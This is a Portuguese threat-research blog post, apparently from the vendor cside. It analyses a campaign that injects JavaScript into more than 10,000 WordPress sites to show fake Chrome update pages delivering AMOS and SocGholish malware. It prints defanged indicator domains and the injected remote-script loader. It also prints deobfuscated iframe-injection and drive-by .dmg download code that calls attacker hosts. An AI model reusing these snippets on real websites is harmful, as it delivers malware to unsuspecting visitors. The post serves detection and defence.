Esta semana identificamos mais de 10.000 sites WordPress exibindo páginas falsas de atualização do navegador Google para os visitantes por meio de um iframe.
A página distribui malware multiplataforma: tanto o AMOS (Atomic macOS Stealer), que tem como alvo usuários Apple, quanto o SocGholish, que tem como alvo usuários Windows.
Esses são malwares populares e disponíveis comercialmente, que circulam há algum tempo. Em geral, acredita-se que as duas variantes eram distribuídas por grupos distintos de atacantes — o que esta descoberta contradiz.
Até onde sabemos, esta também é a primeira vez que eles são distribuídos por meio de um ataque client-side. O JavaScript carregado no navegador do usuário gera a página falsa dentro de um iframe. Os atacantes exploram versões desatualizadas do WordPress e de plugins para dificultar a detecção em sites que não possuem uma ferramenta de monitoramento client-side instalada.
Os atacantes provavelmente exploraram uma vulnerabilidade em um plugin do WordPress para injetar o JavaScript malicioso. Este arquivo atualmente não é sinalizado por nenhum fornecedor de feed de ameaças, assim como o domínio também não é.
Aqui estão dois dos maiores domínios identificados em milhares de sites:
Detalhes técnicos
Usando nosso mecanismo de detecção, encontramos um arquivo JS suspeito de terceiros na seguinte URL:
https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js
Nossa plataforma sinalizou este arquivo como um script malicioso com alto grau de confiança, devido à sua natureza altamente ofuscada, que utilizava múltiplos níveis de codificação. Isso motivou uma análise mais aprofundada, levando-nos a descobrir uma rede com mais de 10.000 sites WordPress infectados.
Um exemplo de site comprometido está disponível em nosso diretório de domínios.
O blackshelter[.]org redireciona o usuário para fastcloudcdn[.]com (link do nosso diretório), que hospeda o JavaScript malicioso.
Em seguida, identificamos múltiplos scripts maliciosos hospedados em diferentes domínios.
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://blacksaltys[.]com/2xIsQSDP8CyeXrv78zk9FGV8lZIj9SXKVc-Mpx3O5H0" id="ms_main_script-js" defer></script>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://objmapper[.]com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e" id="ucf_main_script-js" defer></script>Vários sites contêm elementos <link> projetados para fazer prefetch de DNS de domínios maliciosos, provavelmente para melhorar o desempenho das operações dos atacantes:
<link rel='dns-prefetch' href='//rednosehorse[.]com' />
<link rel='dns-prefetch' href='//blacksaltys[.]com' />
<link rel='dns-prefetch' href='//objmapper[.]com' />
<link rel='dns-prefetch' href='//blackshelter[.]org' />Uma função anônima auto-invocada carrega dinamicamente um arquivo JavaScript externo:
;(function(o, q, f, e, w, j) {
w = q.createElement(f);
j = q.getElementsByTagName(f)[0];
w.async = 1;
w.src = e;
j.parentNode.insertBefore(w, j);
})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);O script externo é carregado e executado dinamicamente, com um parâmetro de consulta (qbsfsc) contendo um timestamp Unix para contornar os mecanismos de cache.
Comportamento malicioso observado
O script ofuscado executa diversas ações.
Primeiro, ele interrompe toda a atividade em andamento no navegador.
window.stop();
Em seguida, remove atributos como class, style, id, entre outros, dos principais elementos HTML.
for (let at of [["class", "style", "lang", "id", "dir"]]) {
el.removeAttribute(at);}Depois disso, injeta o iframe na página dinamicamente, exibindo a falsa página de atualização do Chrome.
let frame = document.createElement("iframe");
frame.srcdoc = rsd;
document.body.appendChild(frame);Análise e Descobertas
Nossa análise revelou que os sites comprometidos estavam rodando versões desatualizadas do WordPress (6.7.1) e de seus plugins, que os atacantes podem ter explorado para injetar código malicioso.
Identificamos 27 domínios maliciosos vinculados a esta atividade.
Alguns exemplos incluem:
- blacksaltys[.]com
- objmapper[.]com
- rednosehorse[.]com
- Blackshelter[.]org
O script malicioso em https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js apresentou uma taxa de detecção de 17/96 no Relatório do VirusTotal.
Durante nossa análise, descobrimos que esta campanha não tem como alvo apenas plataformas Windows, mas também distribui malware para macOS. Conseguimos baixar um arquivo dmg associado ao malware para macOS.
Malware para MacOS e Windows decodificado
O arquivo de malware (274efb6bb2f95deb7c7f8192919bf690d69c3f3a441c81fe2a24284d5f274973), no momento da análise, foi sinalizado por 6 fornecedores de antivírus.
O código a seguir foi descoberto após múltiplas camadas de desofuscação. Ele cria e baixa dinamicamente o arquivo de malware AMOS (Atomic Mac OS Stealer) para macOS.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
</head>
<body>
<script>
(async () => {
try {
var btn = document.createElement("a");
btn.href = `hxxps://extendedstaybrunswick[.]com/wp-content/plugins/reset-wp/resty.php?eg=${Math.floor(Date.now() / 1000)}`;
btn.download = "C_6.12.4.dmg";
document.body.appendChild(btn);
parent.postMessage("loaded", "*");
window.addEventListener("message", function (event) {
if (event.data == "download") {
setTimeout(function () {
btn.click();
}, 100);
}
});
} catch (e) { }
})()
</script>
</body>
</html>O script gera dinamicamente um botão de download vinculado ao payload do malware para macOS. Ele aguarda um evento "message" com o valor "download", que aciona o download do arquivo.
Aqui estão duas fontes para saber mais sobre o malware AMOS.
Além disso, aqui está uma fonte para saber mais sobre o malware SocGholish para Windows.
Tanto o AMOS quanto o SocGholish são malwares disponíveis comercialmente e podem ser adquiridos no Telegram.
Mitigação e proteção
Como primeiro passo, atualize sua instalação do WordPress. Atualize seus plugins, avalie o uso de cada um e remova os que não estão sendo utilizados. Procure pelos scripts e, se encontrá-los, exclua-os. Na maioria das vezes, os atacantes deixam um backdoor. Encontre-o e remova-o.
Se você encontrar esses scripts no seu site, recomendamos fortemente revisar os logs dos últimos 90 dias para identificar quaisquer indicadores de comprometimento ou atividade maliciosa.
Se você baixou algum arquivo dos sites afetados, recomenda-se uma limpeza completa do sistema para mitigar uma possível infecção por malware.
O cside é capaz de detectar, alertar e bloquear ataques client-side como estes, graças ao nosso avançado mecanismo de detecção e proxy. Este ataque teria sido detectado e bloqueado com o cside instalado, protegendo usuários desavisados do download do malware malicioso.
Este ataque reforça a importância de proteger a cadeia de fornecimento web e manter os softwares atualizados. Com base em nossa análise, recomendamos o seguinte:
Você pode começar gratuitamente ou entrar em contato conosco.
Lista completa de sites infectados
Confira links seguros para as páginas do PublicWWW dos domínios infectados:
